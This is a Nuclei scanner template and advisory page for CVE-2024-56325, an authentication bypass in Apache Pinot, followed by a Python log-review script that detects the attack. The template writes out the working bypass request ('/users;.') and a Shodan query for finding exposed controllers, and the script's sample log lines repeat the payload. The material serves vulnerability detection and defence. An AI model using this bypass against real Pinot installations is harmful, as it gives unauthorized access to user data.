Apache Pinot < 1.3.0 - Authentication Bypass

ID: CVE-2024-56325

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,apache,pinot,auth-bypass

This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability. The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.

id: CVE-2024-56325

info:
  name: Apache Pinot < 1.3.0 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.
  remediation: Fixed in version 1.3.0
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-109/
    - https://github.com/advisories/GHSA-6jwp-4wvj-6597
    - https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
    - http://www.openwall.com/lists/oss-security/2025/03/27/8
  classification:
    epss-score: 0.00032
    epss-percentile: 0.05937
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:1696974531
  tags: cve,cve2024,apache,pinot,auth-bypass

http:
  - raw:
      - |
        GET /users HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true

  - raw:
      - |
        GET /users;. HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"users"'

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - 'Pinot-Controller-'
# digest: 4b0a00483046022100e8c898028ad4178f001a3b17d97df81cdade67abb9a16d211c4f7d6fe436c2a4022100c08d3373f2ae551072bd6f4c8c6b26660e4d7e4a064eb60d72d005c3039d8197:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-56325.yaml"
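
A log-review check for the request pattern this template probes, added here as an example and not part of the template or of Apache Pinot: it flags access-log requests that carry `;` path parameters yet resolve to a protected endpoint, and records whether they were served. The log format, the sample lines, and the routing behaviour (that `;...` suffixes are dropped before the endpoint is chosen) are assumptions; only `/users` comes from the template.

```python
import re
from urllib.parse import unquote

# Assumed log shape: common/combined format, e.g. from a reverse proxy.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Endpoints that must require authentication. Only /users comes from the
# template; extend with the other controller endpoints you protect.
PROTECTED = ("/users",)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Apr/2025:10:00:01 +0000] "GET /users HTTP/1.1" 401 64
198.51.100.7 - - [01/Apr/2025:10:00:02 +0000] "GET /users;. HTTP/1.1" 200 512
203.0.113.9 - - [01/Apr/2025:10:05:00 +0000] "GET /users;.?x=1 HTTP/1.1" 403 64
203.0.113.9 - - [01/Apr/2025:10:06:00 +0000] "GET /health HTTP/1.1" 200 2
203.0.113.9 - - [01/Apr/2025:10:07:00 +0000] "GET /users%3Bfoo/admin HTTP/1.1" 200 90
"""

def strip_path_params(path):
    """Remove ';...' path parameters from each segment (assumed routing behaviour)."""
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))

def classify(line, protected=PROTECTED):
    """Return a finding for a path-parameter request to a protected endpoint, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    # Drop the query string; decode so %3B variants are reviewed too (conservative).
    path = unquote(match["target"].split("?", 1)[0])
    if ";" not in path:
        return None
    routed = strip_path_params(path)
    if not any(routed == p or routed.startswith(p + "/") for p in protected):
        return None
    status = int(match["status"])
    # A 2xx answer on such a request needs review; 401/403 means it was refused.
    verdict = "served" if 200 <= status < 300 else "rejected"
    return {"target": match["target"], "routed": routed, "status": status, "verdict": verdict}

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [finding for finding in map(classify, log_text.splitlines()) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `served` finding on a controller older than 1.3.0 warrants checking whether the client was actually authenticated; after upgrading, the same requests should appear as `rejected`.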
